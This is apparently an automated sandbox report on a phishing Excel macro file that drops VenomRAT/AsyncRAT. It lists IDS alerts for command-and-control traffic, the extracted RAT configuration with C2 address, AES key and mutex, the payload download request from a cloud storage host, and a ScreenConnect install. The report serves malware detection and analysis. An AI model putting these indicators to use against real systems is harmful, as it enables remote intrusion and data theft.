2025-03-13T10:43:50.239485+0100 | 2052267 | 1 | Domain Observed Used for C2 Detected | 176.65.142.74 | 4449 | 192.168.2.9 | 49702 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T10:43:50.239485+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 176.65.142.74 | 4449 | 192.168.2.9 | 49702 | TCP
2025-03-13T10:47:08.502623+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 176.65.142.74 | 4449 | 192.168.2.9 | 49709 | TCP
2025-03-13T10:48:30.637010+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 176.65.142.74 | 4449 | 192.168.2.9 | 49712 | TCP
2025-03-13T10:51:38.706091+0100 | 2842478 | 1 | Malware Command and Control Activity Detected | 176.65.142.74 | 4449 | 192.168.2.9 | 49872 | TCP

AV Detection

                            Source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "176.65.142.74", "Ports": "4449,4448", "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "oyLTzCYJW2NXzjfLQfeGJ9SMmgKS3lF7", "Mutex": "daqyvsbasipyrpcr", "Certificate": "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", "ServerSignature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk=", "BDOS": "null", "External_config_on_Pastebin": "false"}
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackMalware Configuration Extractor: VenomRAT {"Host": ["176.65.142.74"], "Port": ["4449", "4448"], "Version": "Venom RAT + HVNC + Stealer + Grabber v6.0.3", "Install": "false", "Mutex": "daqyvsbasipyrpcr", "Certificate": "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", "Server Signature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk="}
                            Source: Document25.xlsmVirustotal: Detection: 33%
                            Source: Document25.xlsmReversingLabs: Detection: 18%
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: 4449,4448
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: 176.65.142.74
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: Venom RAT + HVNC + Stealer + Grabber v6.0.3
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: daqyvsbasipyrpcr
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: 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
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk=
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: null
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: Default
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false
                            Source: 27.2.newpoveno.exe.24b5482b0a0.0.unpackString decryptor: false

                            Phishing

                            Source: Screenshot id: 4Joe Sandbox AI: Screenshot id: 4 contains prominent button: 'view document'
                            Source: Screenshot id: 5Joe Sandbox AI: Screenshot id: 5 contains prominent button: 'view document'
                            Source: Screenshot id: 3Joe Sandbox AI: Screenshot id: 3 contains prominent button: 'view document'
                            Source: Screenshot id: 2Joe Sandbox AI: Screenshot id: 2 contains prominent button: 'view document'
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                            Source: unknownHTTPS traffic detected: 149.137.136.16:443 -> 192.168.2.9:49693 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.9:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49874 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.9:49875 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.9:49876 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49879 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.9:49880 version: TLS 1.2
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: ntkrnlmp.pdb source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Document.exe, 00000025.00000002.4296042211.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: winload_prod.pdb' source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.pdb0$4 source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4293631589.0000000005500000.00000004.08000000.00040000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DB8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6366331058.000000001BAB2000.00000002.00000001.01000000.00000019.sdmp
                            Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.PDB source: ScreenConnect.ClientService.exe, 0000002D.00000002.6315760555.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6333087252.0000000001E72000.00000002.00000001.01000000.00000018.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6327680600.0000000002CD0000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000C7F000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4235339870.0000000002E90000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000000.4266258398.000000000081D000.00000002.00000001.01000000.00000017.sdmp
                            Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000029.00000003.4243485948.0000000004B30000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004DAC000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000003.6134213228.000002CA01C90000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Document.exe, 00000025.00000002.4300058018.000000000594C000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: Document.exe, 00000025.00000002.4248031265.000000000406D000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, rundll32.exe, 00000029.00000003.4239690523.0000000004D3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Document.exe, 00000025.00000000.4208849320.0000000000B51000.00000002.00000001.01000000.00000011.sdmp, Document.exe, 00000025.00000002.4300058018.0000000005946000.00000004.08000000.00040000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4327567013.0000000007794000.00000004.00000800.00020000.00000000.sdmp, Document.exe, 00000025.00000002.4248031265.000000000432C000.00000004.00000800.00020000.00000000.sdmp, 3dc3b4.msi.39.dr
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp
                            Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.ClientService.exe, 0000002D.00000002.6405133374.0000000004D3C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6326836605.0000000002C92000.00000002.00000001.01000000.0000001B.sdmp
                            Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 0000002D.00000002.6377805561.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000002E.00000002.6357649516.0000000012E50000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Document.exe, 00000025.00000000.4208691924.000000000074D000.00000002.00000001.01000000.00000011.sdmp
                            Source: C:\Windows\System32\msiexec.exeFile opened: z:
                            Source: C:\Windows\System32\msiexec.exeFile opened: x:
                            Source: C:\Windows\System32\msiexec.exeFile opened: v:
                            Source: C:\Windows\System32\msiexec.exeFile opened: t:
                            Source: C:\Windows\System32\msiexec.exeFile opened: r:
                            Source: C:\Windows\System32\msiexec.exeFile opened: p:
                            Source: C:\Windows\System32\msiexec.exeFile opened: n:
                            Source: C:\Windows\System32\msiexec.exeFile opened: l:
                            Source: C:\Windows\System32\msiexec.exeFile opened: j:
                            Source: C:\Windows\System32\msiexec.exeFile opened: h:
                            Source: C:\Windows\System32\msiexec.exeFile opened: f:
                            Source: C:\Windows\System32\svchost.exeFile opened: d:
                            Source: C:\Windows\System32\msiexec.exeFile opened: b:
                            Source: C:\Windows\System32\msiexec.exeFile opened: y:
                            Source: C:\Windows\System32\msiexec.exeFile opened: w:
                            Source: C:\Windows\System32\msiexec.exeFile opened: u:
                            Source: C:\Windows\System32\msiexec.exeFile opened: s:
                            Source: C:\Windows\System32\msiexec.exeFile opened: q:
                            Source: C:\Windows\System32\msiexec.exeFile opened: o:
                            Source: C:\Windows\System32\msiexec.exeFile opened: m:
                            Source: C:\Windows\System32\msiexec.exeFile opened: k:
                            Source: C:\Windows\System32\msiexec.exeFile opened: i:
                            Source: C:\Windows\System32\msiexec.exeFile opened: g:
                            Source: C:\Windows\System32\msiexec.exeFile opened: e:
                            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: c:
                            Source: C:\Windows\System32\msiexec.exeFile opened: a:

                            Software Vulnerabilities

                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Program Files\7-Zip\7z.exe
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rcx]8_2_00007FF727F87400
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rsi]8_2_00007FF727F89890
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then sub rsp, 28h8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push rdi8_2_00007FFA209A64E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20D79B00
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20E64120
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then xor eax, eax8_2_00007FFA20D7A2E0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20DA90F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA90F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA90F0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA94C0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA94C0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DFF720
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA9850
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA9850
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then dec eax8_2_00007FFA20DA9850
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebx8_2_00007FFA20DA9940
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push esi8_2_00007FFA20DA9A80
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push ebp8_2_00007FFA20F67BE0
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push edi8_2_00007FFA20DA9B40
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 4x nop then push edi8_2_00007FFA20DA9C00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rcx]22_2_00007FF6CFFB7400
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rsi]22_2_00007FF6CFFB9890
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h22_2_00007FFA164264E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push rdi22_2_00007FFA164264E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA167F9B00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA1687F720
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA16829850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16829850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA16829850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA168294C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA168294C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA168290F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA168290F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA168290F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi22_2_00007FFA16829B40
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebp22_2_00007FFA169E7BE0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi22_2_00007FFA16829C00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16829940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi22_2_00007FFA16829A80
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx22_2_00007FFA16A027B0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then xor eax, eax22_2_00007FFA167FA2E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax22_2_00007FFA168E4120
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi22_2_00007FFA16A02D30
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rcx]27_2_00007FF6CFFB7400
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then mov eax, dword ptr [rsi]27_2_00007FF6CFFB9890
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then sub rsp, 28h27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push rdi27_2_00007FFA200864E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20D79B00
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20E64120
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then xor eax, eax27_2_00007FFA20D7A2E0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20F827B0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi27_2_00007FFA20F82D30
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20DA90F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA90F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA90F0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA94C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA94C0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DFF720
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA9850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA9850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then dec eax27_2_00007FFA20DA9850
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebx27_2_00007FFA20DA9940
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push esi27_2_00007FFA20DA9A80
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push ebp27_2_00007FFA20F67BE0
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi27_2_00007FFA20DA9B40
                            Source: C:\Users\user\SystemRootDoc\newpoveno.exeCode function: 4x nop then push edi27_2_00007FFA20DA9C00

                            Networking

                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49702
                            Source: Network trafficSuricata IDS: 2052265 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 176.65.142.74:4449 -> 192.168.2.9:49702
                            Source: Network trafficSuricata IDS: 2052267 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (VenomRAT) : 176.65.142.74:4449 -> 192.168.2.9:49702
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49709
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49712
                            Source: Network trafficSuricata IDS: 2029606 - Severity 1 - ET MALWARE MSIL/Firebird RAT CnC Checkin : 192.168.2.9:49720 -> 176.65.142.74:4448
                            Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 176.65.142.74:4449 -> 192.168.2.9:49872
                            Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL Service
                            Source: global trafficTCP traffic: 192.168.2.9:49700 -> 176.65.142.74:4448
                            Source: global trafficTCP traffic: 192.168.2.9:53059 -> 1.1.1.1:53
                            Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 13.107.246.60 13.107.246.60
                            Source: Joe Sandbox ViewIP Address: 149.137.136.16 149.137.136.16
                            Source: Joe Sandbox ViewASN Name: WEBTRAFFICDE WEBTRAFFICDE
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49705 -> 13.107.246.60:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49708 -> 13.107.246.60:443
                            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 13.107.246.60:443
                            Source: global traffic | HTTP traffic detected: GET /file/newuploavir/newpoveno.zip HTTP/1.1; Accept: */*; Accept-Language: en-ch; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko; Host: f005.backblazeb2.com; Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1; Connection: Keep-Alive; Accept-Encoding: gzip; User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro); Host: otelrules.svc.static.microsoft
                            Source: global traffic | HTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1; Connection: Keep-Alive; Accept-Encoding: gzip; User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro); Host: otelrules.svc.static.microsoft
                            Source: global traffic | HTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1; Connection: Keep-Alive; Accept-Encoding: gzip; User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro); Host: otelrules.svc.static.microsoft
                            Source: global traffic | HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1; Cache-Control: max-age = 3000; Connection: Keep-Alive; Accept: */*; If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT; User-Agent: Microsoft-CryptoAPI/10.0; Host: c.pki.goog
                            Source: global traffic | HTTP traffic detected: GET /r/r4.crl HTTP/1.1; Cache-Control: max-age = 3000; Connection: Keep-Alive; Accept: */*; If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT; User-Agent: Microsoft-CryptoAPI/10.0; Host: c.pki.goog
                            Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1; Host: ipinfo.io; Connection: Keep-Alive
                            Source: global traffic | HTTP traffic detected: GET /canonical.html HTTP/1.1; Host: detectportal.firefox.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0; Accept: */*; Accept-Language: en-US,en;q=0.5; Accept-Encoding: gzip, deflate; Cache-Control: no-cache; Pragma: no-cache; Connection: keep-alive
                            Source: global traffic | HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1; Host: detectportal.firefox.com; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0; Accept: */*; Accept-Language: en-US,en;q=0.5; Accept-Encoding: gzip, deflate; Connection: keep-alive; Pragma: no-cache; Cache-Control: no-cache
                             Source: global traffic | DNS traffic detected: DNS query: f005.backblazeb2.com
                             Source: global traffic | DNS traffic detected: DNS query: otelrules.svc.static.microsoft
